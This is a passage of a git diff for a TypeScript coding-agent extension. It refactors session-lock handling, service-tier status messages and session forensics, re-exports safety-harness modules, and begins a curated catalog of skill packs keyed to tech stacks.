+  if (!raw) return { ...DEFAULTS };
+
+  return {
+    enabled: typeof raw.enabled === "boolean" ? raw.enabled : DEFAULTS.enabled,
+    evidence_collection: typeof raw.evidence_collection === "boolean" ? raw.evidence_collection : DEFAULTS.evidence_collection,
+    file_change_validation: typeof raw.file_change_validation === "boolean" ? raw.file_change_validation : DEFAULTS.file_change_validation,
+    evidence_cross_reference: typeof raw.evidence_cross_reference === "boolean" ? raw.evidence_cross_reference : DEFAULTS.evidence_cross_reference,
+    destructive_command_warnings: typeof raw.destructive_command_warnings === "boolean" ? raw.destructive_command_warnings : DEFAULTS.destructive_command_warnings,
+    content_validation: typeof raw.content_validation === "boolean" ? raw.content_validation : DEFAULTS.content_validation,
+    checkpoints: typeof raw.checkpoints === "boolean" ? raw.checkpoints : DEFAULTS.checkpoints,
+    auto_rollback: typeof raw.auto_rollback === "boolean" ? raw.auto_rollback : DEFAULTS.auto_rollback,
+    timeout_scale_cap: typeof raw.timeout_scale_cap === "number" ? raw.timeout_scale_cap : DEFAULTS.timeout_scale_cap,
+  };
+}
+
+/**
+ * Check if the safety harness is enabled.
+ * Used as a fast gate at hook registration and phase integration points.
+ */
+export function isHarnessEnabled(
+  raw: Record<string, unknown> | undefined,
+): boolean {
+  if (!raw) return DEFAULTS.enabled;
+  if (typeof raw.enabled === "boolean") return raw.enabled;
+  return DEFAULTS.enabled;
+}
+
+// ─── Re-exports ─────────────────────────────────────────────────────────────
+
+export {
+  resetEvidence,
+  getEvidence,
+  getBashEvidence,
+  getFilePaths,
+  recordToolCall,
+  recordToolResult,
+} from "./evidence-collector.js";
+
+export type { EvidenceEntry, BashEvidence, FileWriteEvidence, FileEditEvidence } from "./evidence-collector.js";
+
+export { classifyCommand } from "./destructive-guard.js";
+export type { CommandClassification } from "./destructive-guard.js";
+
+export { validateFileChanges } from "./file-change-validator.js";
+export type { FileChangeAudit, FileViolation } from "./file-change-validator.js";
+
+export { crossReferenceEvidence } from "./evidence-cross-ref.js";
+export type { ClaimedEvidence, EvidenceMismatch } from "./evidence-cross-ref.js";
+
+export { createCheckpoint, rollbackToCheckpoint, cleanupCheckpoint } from "./git-checkpoint.js";
+
+export { validateContent } from "./content-validator.js";
+export type { ContentViolation } from "./content-validator.js";
diff --git a/src/resources/extensions/gsd/service-tier.ts b/src/resources/extensions/gsd/service-tier.ts
index 7e2f4613a..fd4c959d6 100644
--- a/src/resources/extensions/gsd/service-tier.ts
+++ b/src/resources/extensions/gsd/service-tier.ts
@@ -23,17 +23,31 @@ import { ensurePreferencesFile, serializePreferencesToFrontmatter } from "./comm
 
 export type ServiceTierSetting = "priority" | "flex" | undefined;
 
+const SERVICE_TIER_SCOPE_NOTE = "Only affects gpt-5.4 models, regardless of provider.";
+
 // ─── Gating ──────────────────────────────────────────────────────────────────
 
+/**
+ * Model ID prefixes (bare, without provider) that support OpenAI service tiers.
+ *
+ * This list is the fallback for callers that only have a model ID string.
+ * The authoritative source of truth is `model.capabilities.supportsServiceTier`
+ * (set via CAPABILITY_PATCHES in packages/pi-ai/src/models.ts). When callers
+ * have access to the full Model object, prefer reading capabilities directly.
+ *
+ * See: https://github.com/gsd-build/gsd-2/issues/2546
+ */
+const SERVICE_TIER_MODEL_PREFIXES = ["gpt-5.4"] as const;
+
 /**
  * Returns true when the given model ID supports OpenAI service tiers.
- * Currently only gpt-5.4 variants qualify.
+ * Reads from SERVICE_TIER_MODEL_PREFIXES — update that list, not this function.
  */
 export function supportsServiceTier(modelId: string): boolean {
   if (!modelId) return false;
   // Strip provider prefix if present (e.g. "openai/gpt-5.4" → "gpt-5.4")
   const bare = modelId.includes("/") ? modelId.split("/").pop()! : modelId;
-  return bare.startsWith("gpt-5.4");
+  return SERVICE_TIER_MODEL_PREFIXES.some((prefix) => bare.startsWith(prefix));
 }
 
 // ─── Status Formatting ───────────────────────────────────────────────────────
@@ -51,7 +65,7 @@ export function formatServiceTierStatus(tier: ServiceTierSetting): string {
       "  /gsd fast flex   Set to flex (0.5x cost, slower)",
       "  /gsd fast off    Disable service tier",
       "",
-      "Only affects gpt-5.4 models.",
+      SERVICE_TIER_SCOPE_NOTE,
     ].join("\n");
   }
 
@@ -64,10 +78,18 @@ export function formatServiceTierStatus(tier: ServiceTierSetting): string {
     "  /gsd fast flex   Set to flex (0.5x cost, slower)",
     "  /gsd fast off    Disable service tier",
     "",
-    "Only affects gpt-5.4 models.",
+    SERVICE_TIER_SCOPE_NOTE,
   ].join("\n");
 }
 
+export function formatServiceTierFooterStatus(
+  tier: ServiceTierSetting,
+  modelId: string | undefined,
+): string | undefined {
+  if (!tier || !modelId || !supportsServiceTier(modelId)) return undefined;
+  return tier === "priority" ? "fast: ⚡ priority" : "fast: 💰 flex";
+}
+
 // ─── Icon Resolution ─────────────────────────────────────────────────────────
 
 /**
@@ -148,19 +170,22 @@ export async function handleFast(args: string, ctx: ExtensionCommandContext): Pr
 
   if (trimmed === "on") {
     await writeGlobalServiceTier(ctx, "priority");
-    ctx.ui.notify("Service tier set to priority (2x cost, faster responses). Only affects gpt-5.4 models.", "info");
+    ctx.ui.setStatus("gsd-fast", formatServiceTierFooterStatus("priority", ctx.model?.id));
+    ctx.ui.notify("Service tier set to priority (2x cost, faster responses). Only affects gpt-5.4 models, regardless of provider.", "info");
     return;
   }
 
   if (trimmed === "off") {
     await writeGlobalServiceTier(ctx, undefined);
+    ctx.ui.setStatus("gsd-fast", undefined);
     ctx.ui.notify("Service tier disabled.", "info");
     return;
   }
 
   if (trimmed === "flex") {
     await writeGlobalServiceTier(ctx, "flex");
-    ctx.ui.notify("Service tier set to flex (0.5x cost, slower responses). Only affects gpt-5.4 models.", "info");
+    ctx.ui.setStatus("gsd-fast", formatServiceTierFooterStatus("flex", ctx.model?.id));
+    ctx.ui.notify("Service tier set to flex (0.5x cost, slower responses). Only affects gpt-5.4 models, regardless of provider.", "info");
     return;
   }
 
diff --git a/src/resources/extensions/gsd/session-forensics.ts b/src/resources/extensions/gsd/session-forensics.ts
index 04894fe1f..9cf0a23c5 100644
--- a/src/resources/extensions/gsd/session-forensics.ts
+++ b/src/resources/extensions/gsd/session-forensics.ts
@@ -25,7 +25,6 @@ import { truncateWithEllipsis } from "../shared/format-utils.js";
 import { nativeParseJsonlTail } from "./native-parser-bridge.js";
 import { MAX_JSONL_BYTES, parseJSONL } from "./jsonl-utils.js";
 import { nativeWorkingTreeStatus, nativeDiffStat } from "./native-git-bridge.js";
-import { getAutoWorktreePath } from "./auto-worktree.js";
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
@@ -172,7 +171,17 @@ export function extractTrace(entries: unknown[]): ExecutionTrace {
       }
 
       if (isError && resultText) {
-        errors.push(resultText.slice(0, 300));
+        // Filter out benign "errors" that are normal during code exploration:
+        // - grep/rg/find returning exit code 1 (no matches) is expected POSIX behavior
+        // - User interrupts (Escape/skip) are intentional, not failures
+        const trimmed = resultText.trim();
+        const isBenignNoMatch = pending?.name === "bash" &&
+          /^\(no output\)\s*\n\s*Command exited with code 1$/m.test(trimmed);
+        const isUserSkip = /^Skipped due to queued user message/i.test(trimmed);
+
+        if (!isBenignNoMatch && !isUserSkip) {
+          errors.push(resultText.slice(0, 300));
+        }
       }
     }
   }
@@ -285,17 +294,13 @@ export function synthesizeCrashRecovery(
  * Deep diagnostic from any JSONL source (activity log or session file).
  * Replaces the old shallow getLastActivityDiagnostic().
  */
-export function getDeepDiagnostic(basePath: string): string | null {
-  // Try worktree activity logs first if an auto-worktree is active
+export function getDeepDiagnostic(basePath: string, worktreePath?: string): string | null {
+  // Try worktree activity logs first if a worktree path is provided
   let trace: ExecutionTrace | null = null;
   try {
-    const mid = readActiveMilestoneId(basePath);
-    if (mid) {
-      const wtPath = getAutoWorktreePath(basePath, mid);
-      if (wtPath) {
-        const wtActivityDir = join(gsdRoot(wtPath), "activity");
-        trace = readLastActivityLog(wtActivityDir);
-      }
+    if (worktreePath) {
+      const wtActivityDir = join(gsdRoot(worktreePath), "activity");
+      trace = readLastActivityLog(wtActivityDir);
     }
   } catch { /* non-fatal — fall through to root */ }
 
@@ -313,7 +318,7 @@ export function getDeepDiagnostic(basePath: string): string | null {
  * Read the active milestone ID directly from STATE.md without async deriveState().
  * Looks for `**Active Milestone:** M001` pattern.
  */
-function readActiveMilestoneId(basePath: string): string | null {
+export function readActiveMilestoneId(basePath: string): string | null {
   try {
     const statePath = join(gsdRoot(basePath), "STATE.md");
     if (!existsSync(statePath)) return null;
@@ -467,9 +472,13 @@ function formatTraceSummary(trace: ExecutionTrace): string {
   if (trace.errors.length > 0) {
     parts.push(`Errors: ${trace.errors.slice(-3).join("; ")}`);
   }
-  if (trace.lastReasoning) {
-    parts.push(`Last reasoning: "${trace.lastReasoning}"`);
-  }
+  // NOTE: lastReasoning is intentionally excluded from the retry diagnostic.
+  // This summary is injected into retry prompts via getDeepDiagnostic() →
+  // phases.ts. Including prior assistant free-text causes hallucination loops
+  // when the previous turn was truncated or malformed. Crash recovery has its
+  // own path (formatCrashRecoveryBriefing) that handles lastReasoning safely
+  // with explicit "Last Agent Reasoning Before Interruption" framing.
+  // See: https://github.com/gsd-build/gsd-2/issues/2195
   return parts.join("\n");
 }
 
diff --git a/src/resources/extensions/gsd/session-lock.ts b/src/resources/extensions/gsd/session-lock.ts
index eb9ea9fcc..e3bbe7c49 100644
--- a/src/resources/extensions/gsd/session-lock.ts
+++ b/src/resources/extensions/gsd/session-lock.ts
@@ -32,7 +32,6 @@ export interface SessionLockData {
   unitType: string;
   unitId: string;
   unitStartedAt: string;
-  completedUnits: number;
   sessionFile?: string;
 }
 
@@ -84,10 +83,31 @@ let _lockAcquiredAt: number = 0;
 
 const LOCK_FILE = "auto.lock";
 
+/**
+ * Derive the effective lock file name for the current process.
+ * In parallel worker mode (GSD_PARALLEL_WORKER + GSD_MILESTONE_LOCK),
+ * each worker uses a per-milestone lock file (`auto-<milestoneId>.lock`)
+ * to avoid contending on the shared `.gsd/auto.lock` (#2184).
+ */
+export function effectiveLockFile(): string {
+  const mid = process.env.GSD_PARALLEL_WORKER ? process.env.GSD_MILESTONE_LOCK : null;
+  return mid ? `auto-${mid}.lock` : LOCK_FILE;
+}
+
+/**
+ * Derive the OS-level lock target directory for the current process.
+ * In parallel worker mode, uses `.gsd/parallel/<milestoneId>/` instead of
+ * `.gsd/` so workers don't contend on the same proper-lockfile directory (#2184).
+ */
+export function effectiveLockTarget(gsdDir: string): string {
+  const mid = process.env.GSD_PARALLEL_WORKER ? process.env.GSD_MILESTONE_LOCK : null;
+  return mid ? join(gsdDir, "parallel", mid) : gsdDir;
+}
+
 function lockPath(basePath: string): string {
   // If we have a snapshotted path from acquisition, use it for consistency
   if (_snapshotLockPath) return _snapshotLockPath;
-  return join(gsdRoot(basePath), LOCK_FILE);
+  return join(gsdRoot(basePath), effectiveLockFile());
 }
 
 // ─── Stray Lock Cleanup ─────────────────────────────────────────────────────
@@ -168,6 +188,56 @@ function ensureExitHandler(_gsdDir: string): void {
   });
 }
 
+// ─── Lock Acquisition Helpers ───────────────────────────────────────────────
+
+/**
+ * Create the onCompromised callback for proper-lockfile.
+ *
+ * proper-lockfile fires onCompromised when it detects mtime drift (system sleep,
+ * event loop stall, etc.). The default handler throws inside setTimeout — an
+ * uncaught exception that crashes or corrupts process state.
+ *
+ * False-positive suppression (#1362): If we're still within the stale window
+ * (30 min since acquisition), the mtime mismatch is from an event loop stall
+ * during a long LLM call — not a real takeover. Log and continue.
+ *
+ * PID ownership check (#1578): Past the stale window, check if the lock file
+ * still contains our PID before declaring compromise. Retry reads tolerate
+ * transient filesystem hiccups (NFS/CIFS latency, APFS snapshots, etc.) (#2324).
+ */
+function createLockCompromisedHandler(lockFilePath: string): () => void {
+  return () => {
+    const elapsed = Date.now() - _lockAcquiredAt;
+    if (elapsed < 1_800_000) {
+      process.stderr.write(
+        `[gsd] Lock heartbeat caught up after ${Math.round(elapsed / 1000)}s — long LLM call, no action needed.\n`,
+      );
+      return;
+    }
+    const existing = readExistingLockDataWithRetry(lockFilePath);
+    if (existing && existing.pid === process.pid) {
+      process.stderr.write(
+        `[gsd] Lock heartbeat mismatch after ${Math.round(elapsed / 1000)}s — lock file still owned by PID ${process.pid}, treating as false positive.\n`,
+      );
+      return;
+    }
+    _lockCompromised = true;
+    _releaseFunction = null;
+  };
+}
+
+/**
+ * Assign module-level lock state after a successful lock acquisition.
+ */
+function assignLockState(basePath: string, release: () => void, lockFilePath: string): void {
+  _releaseFunction = release;
+  _lockedPath = basePath;
+  _lockPid = process.pid;
+  _lockCompromised = false;
+  _lockAcquiredAt = Date.now();
+  _snapshotLockPath = lockFilePath;
+}
+
 // ─── Public API ─────────────────────────────────────────────────────────────
 
 /**
@@ -205,7 +275,6 @@ export function acquireSessionLock(basePath: string): SessionLockResult {
     unitType: "starting",
     unitId: "bootstrap",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
 
   let lockfile: typeof import("proper-lockfile");
@@ -217,58 +286,41 @@ export function acquireSessionLock(basePath: string): SessionLockResult {
   }
 
   const gsdDir = gsdRoot(basePath);
+  const lockTarget = effectiveLockTarget(gsdDir);
+
+  // #3218: Pre-flight stale lock cleanup — if the .lock/ directory exists but
+  // no auto.lock metadata is present (or the PID is dead), remove the lock
+  // directory before attempting acquisition. This prevents the 30-min stale
+  // window from blocking /gsd after crashes, SIGKILL, or laptop sleep.
+  const lockDir = lockTarget + ".lock";
+  if (existsSync(lockDir)) {
+    const existingData = readExistingLockData(lp);
+    const isOrphan = !existingData || (existingData.pid && !isPidAlive(existingData.pid));
+    if (isOrphan) {
+      try { rmSync(lockDir, { recursive: true, force: true }); } catch { /* best-effort */ }
+      try { if (existsSync(lp)) unlinkSync(lp); } catch { /* best-effort */ }
+    }
+  }
 
   try {
-    // Try to acquire an exclusive OS-level lock on the lock file.
-    // We lock the directory (gsdRoot) since proper-lockfile works best
-    // on directories, and the lock file itself may not exist yet.
-    mkdirSync(gsdDir, { recursive: true });
+    // Try to acquire an exclusive OS-level lock on the lock target.
+    // We lock a directory since proper-lockfile works best on directories,
+    // and the lock file itself may not exist yet.
+    // In parallel worker mode, lockTarget is .gsd/parallel/<MID>/ (#2184).
+    mkdirSync(lockTarget, { recursive: true });
 
-    const release = lockfile.lockSync(gsdDir, {
+    const release = lockfile.lockSync(lockTarget, {
       realpath: false,
       stale: 1_800_000, // 30 minutes — safe for laptop sleep / long event loop stalls
       update: 10_000, // Update lock mtime every 10s to prove liveness
-      onCompromised: () => {
-        // proper-lockfile detected mtime drift (system sleep, event loop stall, etc.).
-        // Default handler throws inside setTimeout — an uncaught exception that crashes
-        // or corrupts process state.
-        //
-        // False-positive suppression (#1362): If we're still within the stale window
-        // (30 min since acquisition), the mtime mismatch is from an event loop stall
-        // during a long LLM call — not a real takeover. Log and continue.
-        const elapsed = Date.now() - _lockAcquiredAt;
-        if (elapsed < 1_800_000) {
-          process.stderr.write(
-            `[gsd] Lock heartbeat mismatch after ${Math.round(elapsed / 1000)}s — event loop stall, continuing.\n`,
-          );
-          return; // Suppress false positive
-        }
-        // Past the stale window — check if the lock file still belongs to us before
-        // declaring compromise (#1578). If our PID still owns the metadata, this is
-        // a false positive from a very long event loop stall (e.g. subagent execution).
-        const existing = readExistingLockData(lp);
-        if (existing && existing.pid === process.pid) {
-          process.stderr.write(
-            `[gsd] Lock heartbeat mismatch after ${Math.round(elapsed / 1000)}s — lock file still owned by PID ${process.pid}, treating as false positive.\n`,
-          );
-          return; // Our PID still owns the lock file — no real takeover
-        }
-        // Lock file is gone or owned by another PID — real compromise
-        _lockCompromised = true;
-        _releaseFunction = null;
-      },
+      onCompromised: createLockCompromisedHandler(lp),
     });
 
-    _releaseFunction = release;
-    _lockedPath = basePath;
-    _lockPid = process.pid;
-    _lockCompromised = false;
-    _lockAcquiredAt = Date.now();
-    _snapshotLockPath = lp; // Snapshot the resolved path for consistent access (#1363)
+    assignLockState(basePath, release, lp);
 
     // Safety net: clean up lock dir on process exit if _releaseFunction
     // wasn't called (e.g., normal exit after clean completion) (#1245).
-    ensureExitHandler(gsdDir);
+    ensureExitHandler(lockTarget);
 
     // Write the informational lock data
     atomicWriteSync(lp, JSON.stringify(lockData, null, 2));
@@ -283,47 +335,21 @@ export function acquireSessionLock(basePath: string): SessionLockResult {
     // If no lock file or no alive process, try to clean up and re-acquire (#1245)
     if (!existingData || (existingPid && !isPidAlive(existingPid))) {
       try {
-        const lockDir = join(gsdDir + ".lock");
+        const lockDir = join(lockTarget + ".lock");
         if (existsSync(lockDir)) rmSync(lockDir, { recursive: true, force: true });
         if (existsSync(lp)) unlinkSync(lp);
 
         // Retry acquisition after cleanup
-        const release = lockfile.lockSync(gsdDir, {
+        const release = lockfile.lockSync(lockTarget, {
           realpath: false,
           stale: 1_800_000, // 30 minutes — match primary lock settings
           update: 10_000,
-          onCompromised: () => {
-            // Same false-positive suppression as the primary lock (#1512).
-            // Without this, the retry path fires _lockCompromised unconditionally
-            // on benign mtime drift (laptop sleep, heavy LLM event loop stalls).
-            const elapsed = Date.now() - _lockAcquiredAt;
-            if (elapsed < 1_800_000) {
-              process.stderr.write(
-                `[gsd] Lock heartbeat mismatch after ${Math.round(elapsed / 1000)}s — event loop stall, continuing.\n`,
-              );
-              return;
-            }
-            // Check PID ownership before declaring compromise (#1578)
-            const existing = readExistingLockData(lp);
-            if (existing && existing.pid === process.pid) {
-              process.stderr.write(
-                `[gsd] Lock heartbeat mismatch after ${Math.round(elapsed / 1000)}s — lock file still owned by PID ${process.pid}, treating as false positive.\n`,
-              );
-              return;
-            }
-            _lockCompromised = true;
-            _releaseFunction = null;
-          },
+          onCompromised: createLockCompromisedHandler(lp),
         });
-        _releaseFunction = release;
-        _lockedPath = basePath;
-        _lockPid = process.pid;
-        _lockCompromised = false;
-        _lockAcquiredAt = Date.now();
-        _snapshotLockPath = lp; // Snapshot for retry path too (#1363)
+        assignLockState(basePath, release, lp);
 
         // Safety net — uses centralized handler to avoid double-registration
-        ensureExitHandler(gsdDir);
+        ensureExitHandler(lockTarget);
 
         atomicWriteSync(lp, JSON.stringify(lockData, null, 2));
         return { acquired: true };
@@ -332,9 +358,11 @@ export function acquireSessionLock(basePath: string): SessionLockResult {
       }
     }
 
+    // #3218: Provide actionable workaround when lock recovery fails
+    const lockDirPath = lockTarget + ".lock";
     const reason = existingPid
       ? `Another auto-mode session (PID ${existingPid}) appears to be running.\nStop it with \`kill ${existingPid}\` before starting a new session.`
-      : `Another auto-mode session is already running on this project.`;
+      : `Another auto-mode session lock is stuck on this project.\nRun: rm -rf "${lockDirPath}" && rm -f "${lp}"`;
 
     return { acquired: false, reason, existingPid };
   }
@@ -379,7 +407,6 @@ export function updateSessionLock(
   basePath: string,
   unitType: string,
   unitId: string,
-  completedUnits: number,
   sessionFile?: string,
 ): void {
   if (_lockedPath !== basePath && _lockedPath !== null) return;
@@ -392,7 +419,6 @@ export function updateSessionLock(
       unitType,
       unitId,
       unitStartedAt: new Date().toISOString(),
-      completedUnits,
       sessionFile,
     };
     atomicWriteSync(lp, JSON.stringify(data, null, 2));
@@ -417,7 +443,8 @@ export function getSessionLockStatus(basePath: string): SessionLockStatus {
     // onCompromised fired from benign mtime drift (laptop sleep, event loop stall
     // beyond the stale window). Attempt re-acquisition instead of giving up.
     const lp = lockPath(basePath);
-    const existing = readExistingLockData(lp);
+    // Retry reads to tolerate transient filesystem hiccups (#2324).
+    const existing = readExistingLockDataWithRetry(lp);
     if (existing && existing.pid === process.pid) {
       // Lock file still ours — try to re-acquire the OS lock
       try {
@@ -495,13 +522,24 @@ export function releaseSessionLock(basePath: string): void {
     // Non-fatal
   }
 
-  // Remove the proper-lockfile directory (.gsd.lock/) for the current path
+  // Remove the proper-lockfile directory for the current lock target.
+  // In parallel worker mode, this is .gsd/parallel/<MID>.lock/ (#2184).
+  const gsdDir = gsdRoot(basePath);
+  const lockTarget = effectiveLockTarget(gsdDir);
   try {
-    const lockDir = join(gsdRoot(basePath) + ".lock");
+    const lockDir = join(lockTarget + ".lock");
     if (existsSync(lockDir)) rmSync(lockDir, { recursive: true, force: true });
   } catch {
     // Non-fatal
   }
+  // Also clean the per-milestone parallel directory itself if it exists
+  if (lockTarget !== gsdDir) {
+    try {
+      if (existsSync(lockTarget)) rmSync(lockTarget, { recursive: true, force: true });
+    } catch {
+      // Non-fatal
+    }
+  }
 
   // Clean ALL registered lock paths (#1578) — lock files accumulate across
   // main project .gsd/, worktree .gsd/, and projects registry paths.
@@ -569,6 +607,42 @@ function readExistingLockData(lp: string): SessionLockData | null {
   }
 }
 
+/**
+ * Retry-tolerant variant of readExistingLockData for use in onCompromised and
+ * other paths where a transient filesystem hiccup (NFS/CIFS latency, macOS APFS
+ * snapshot, concurrent process briefly holding the file) should NOT be treated
+ * as "lock file gone" (#2324).
+ *
+ * Retries up to `maxAttempts` times with `delayMs` between each attempt.
+ * Only returns null when ALL retries fail to read valid data.
+ */
+export interface RetryOptions {
+  maxAttempts?: number;
+  delayMs?: number;
+}
+
+export function readExistingLockDataWithRetry(
+  lp: string,
+  options?: RetryOptions,
+): SessionLockData | null {
+  const maxAttempts = options?.maxAttempts ?? 3;
+  const delayMs = options?.delayMs ?? 200;
+
+  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
+    const data = readExistingLockData(lp);
+    if (data !== null) return data;
+    if (attempt < maxAttempts) {
+      // Synchronous busy-wait — onCompromised runs in a sync callback context
+      // and the delays are short (200ms default).
+      const start = Date.now();
+      while (Date.now() - start < delayMs) {
+        // busy-wait
+      }
+    }
+  }
+  return null;
+}
+
 function isPidAlive(pid: number): boolean {
   if (!Number.isInteger(pid) || pid <= 0) return false;
   if (pid === process.pid) return false;
diff --git a/src/resources/extensions/gsd/skill-catalog.ts b/src/resources/extensions/gsd/skill-catalog.ts
new file mode 100644
index 000000000..7a061b067
--- /dev/null
+++ b/src/resources/extensions/gsd/skill-catalog.ts
@@ -0,0 +1,1088 @@
+/**
+ * GSD Skill Catalog — Curated skill packs mapped to tech stacks.
+ *
+ * Each pack maps a detected (or user-chosen) tech stack to a skills.sh
+ * repo + specific skill names.  The init wizard uses this catalog to
+ * install relevant skills during project onboarding.
+ *
+ * Installation is delegated entirely to the skills.sh CLI:
+ *   npx skills add <repo> --skill <name> --skill <name> -y
+ *
+ * Skills are installed into ~/.agents/skills/ (the industry-standard
+ * ecosystem directory shared across all agents).
+ */
+
+import { execFile } from "node:child_process";
+import { existsSync } from "node:fs";
+import { join } from "node:path";
+import { homedir } from "node:os";
+import type { ExtensionCommandContext } from "@gsd/pi-coding-agent";
+import { showNextAction } from "../shared/tui.js";
+import type { ProjectSignals, XcodePlatform } from "./detection.js";
+
+// ─── Catalog Types ────────────────────────────────────────────────────────────
+
+export interface SkillPack {
+  /** Human-readable name shown in the wizard */
+  label: string;
+  /** Short description */
+  description: string;
+  /** skills.sh repo identifier (owner/repo) */
+  repo: string;
+  /** Specific skill names to install from the repo */
+  skills: string[];
+  /** Which detected primaryLanguage values trigger this pack */
+  matchLanguages?: string[];
+  /** Which detected project files trigger this pack */
+  matchFiles?: string[];
+  /** Trigger when Xcode project targets one of these platforms */
+  matchXcodePlatforms?: XcodePlatform[];
+  /** Always include this pack in brownfield recommendations */
+  matchAlways?: boolean;
+}
+
+// ─── Curated Catalog ──────────────────────────────────────────────────────────
+
+export const SKILL_CATALOG: SkillPack[] = [
+  // ── Swift (language-level — any Swift project) ────────────────────────────
+  {
+    label: "SwiftUI",
+    description: "SwiftUI layout, navigation, animations, gestures, Liquid Glass",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "swiftui-animation",
+      "swiftui-gestures",
+      "swiftui-layout-components",
+      "swiftui-liquid-glass",
+      "swiftui-navigation",
+      "swiftui-patterns",
+      "swiftui-performance",
+      "swiftui-uikit-interop",
+    ],
+    matchLanguages: ["swift"],
+    matchFiles: ["Package.swift"],
+  },
+  {
+    label: "Swift Core",
+    description: "Swift language, concurrency, Codable, Charts, Testing, SwiftData",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "swift-codable",
+      "swift-charts",
+      "swift-concurrency",
+      "swift-language",
+      "swift-testing",
+      "swiftdata",
+    ],
+    matchLanguages: ["swift"],
+    matchFiles: ["Package.swift"],
+  },
+  // ── iOS (Xcode project targeting iphoneos required) ───────────────────────
+  {
+    label: "iOS App Frameworks",
+    description: "App Intents, Widgets, StoreKit, MapKit, Live Activities, push notifications",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "alarmkit",
+      "app-clips",
+      "app-intents",
+      "live-activities",
+      "mapkit-location",
+      "photos-camera-media",
+      "push-notifications",
+      "storekit",
+      "tipkit",
+      "widgetkit",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  {
+    label: "iOS Data Frameworks",
+    description: "CloudKit, HealthKit, MusicKit, WeatherKit, Contacts, Calendar",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "cloudkit-sync",
+      "contacts-framework",
+      "eventkit-calendar",
+      "healthkit",
+      "musickit-audio",
+      "passkit-wallet",
+      "weatherkit",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  {
+    label: "iOS AI & ML",
+    description: "Core ML, Vision, on-device AI, speech recognition, NLP",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "apple-on-device-ai",
+      "coreml",
+      "natural-language",
+      "speech-recognition",
+      "vision-framework",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  {
+    label: "iOS Engineering",
+    description: "Networking, security, accessibility, localization, Instruments, App Store review",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "app-store-review",
+      "authentication",
+      "background-processing",
+      "debugging-instruments",
+      "device-integrity",
+      "ios-accessibility",
+      "ios-localization",
+      "ios-networking",
+      "ios-security",
+      "metrickit-diagnostics",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  {
+    label: "iOS Hardware",
+    description: "Bluetooth, CoreMotion, NFC, PencilKit, RealityKit AR",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "core-bluetooth",
+      "core-motion",
+      "core-nfc",
+      "pencilkit-drawing",
+      "realitykit-ar",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  {
+    label: "iOS Platform",
+    description: "CallKit, EnergyKit, HomeKit, SharePlay, PermissionKit",
+    repo: "dpearson2699/swift-ios-skills",
+    skills: [
+      "callkit-voip",
+      "energykit",
+      "homekit-matter",
+      "permissionkit",
+      "shareplay-activities",
+    ],
+    matchXcodePlatforms: ["iphoneos"],
+  },
+  // ── React / Next.js ───────────────────────────────────────────────────────
+  {
+    label: "React & Web Frontend",
+    description: "React best practices and composition patterns",
+    repo: "vercel-labs/agent-skills",
+    skills: [
+      "vercel-react-best-practices",
+      "vercel-composition-patterns",
+    ],
+    matchLanguages: ["javascript/typescript"],
+  },
+  {
+    label: "shadcn/ui",
+    description: "shadcn/ui component library patterns and usage",
+    repo: "shadcn/ui",
+    skills: ["shadcn"],
+    matchLanguages: ["javascript/typescript"],
+  },
+  // ── React Native ──────────────────────────────────────────────────────────
+  {
+    label: "React Native",
+    description: "React Native and Expo best practices for performant mobile apps",
+    repo: "vercel-labs/agent-skills",
+    skills: ["vercel-react-native-skills"],
+    matchFiles: ["metro.config.js", "metro.config.ts", "react-native.config.js"],
+  },
+  {
+    label: "React Native Architecture",
+    description: "React Native app architecture, navigation, and cross-platform design patterns",
+    repo: "wshobson/agents",
+    skills: ["react-native-architecture", "react-native-design"],
+    matchFiles: ["metro.config.js", "metro.config.ts", "react-native.config.js"],
+  },
+  // ── TypeScript & JS Ecosystem (wshobson/agents — 41K combined installs) ──
+  {
+    label: "TypeScript & JS Development",
+    description: "Advanced TypeScript types, Node.js backend, testing, and modern JS patterns",
+    repo: "wshobson/agents",
+    skills: [
+      "typescript-advanced-types",
+      "nodejs-backend-patterns",
+      "javascript-testing-patterns",
+      "modern-javascript-patterns",
+    ],
+    matchLanguages: ["javascript/typescript"],
+  },
+  // ── React State (wshobson/agents — 8.1K combined installs) ─────────────
+  {
+    label: "React State & Patterns",
+    description: "State management with Zustand, Jotai, React Query, and React modernization",
+    repo: "wshobson/agents",
+    skills: ["react-state-management", "react-modernization"],
+    matchLanguages: ["javascript/typescript"],
+  },
+  // ── Tailwind CSS (wshobson/agents — 22.8K installs) ───────────────────
+  {
+    label: "Tailwind CSS",
+    description: "Tailwind v4 design system, CVA patterns, and utility-first CSS",
+    repo: "wshobson/agents",
+    skills: ["tailwind-design-system"],
+    matchFiles: [
+      "tailwind.config.js",
+      "tailwind.config.ts",
+      "tailwind.config.mjs",
+      "tailwind.config.cjs",
+    ],
+  },
+  // ── General Frontend ──────────────────────────────────────────────────────
+  {
+    label: "Frontend Design & UX",
+    description: "Frontend design, accessibility, and browser automation",
+    repo: "anthropics/skills",
+    skills: ["frontend-design"],
+    matchLanguages: ["javascript/typescript"],
+  },
+  // ── Angular ───────────────────────────────────────────────────────────────
+  {
+    label: "Angular",
+    description: "Angular components, signals, forms, routing, and testing",
+    repo: "analogjs/angular-skills",
+    skills: [
+      "angular-component",
+      "angular-signals",
+      "angular-forms",
+      "angular-routing",
+      "angular-testing",
+    ],
+    matchFiles: ["angular.json"],
+  },
+  {
+    label: "Angular Migration",
+    description: "Migrate from AngularJS to Angular with hybrid mode and incremental rewriting",
+    repo: "wshobson/agents",
+    skills: ["angular-migration"],
+    matchFiles: ["angular.json"],
+  },
+  // ── Vue.js / Nuxt ────────────────────────────────────────────────────────
+  {
+    label: "Vue.js",
+    description: "Vue best practices, Pinia state, Vue Router, and testing",
+    repo: "vuejs-ai/skills",
+    skills: [
